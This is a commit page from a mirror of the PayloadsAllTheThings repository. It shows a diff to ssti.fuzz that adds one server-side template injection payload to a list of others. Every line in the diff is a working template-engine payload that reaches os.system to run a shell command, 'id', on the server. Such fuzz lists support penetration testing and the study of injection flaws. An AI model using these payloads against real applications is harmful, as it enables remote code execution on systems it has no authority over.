mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-20 03:16:10 +00:00
Update ssti.fuzz
This commit is contained in:
parent
bdab385cfb
commit
b0f90090c1
@ -55,3 +55,4 @@ ${self.template.module.runtime.util.os.system("id")}
|
|||||||
${self.module.filters.compat.inspect.os.system("id")}
|
${self.module.filters.compat.inspect.os.system("id")}
|
||||||
${self.module.runtime.compat.inspect.os.system("id")}
|
${self.module.runtime.compat.inspect.os.system("id")}
|
||||||
${self.module.runtime.exceptions.util.os.system("id")}
|
${self.module.runtime.exceptions.util.os.system("id")}
|
||||||
|
${self.template.__init__.__globals__['os'].system('id')}
|
||||||
|
Loading…
Reference in New Issue
Block a user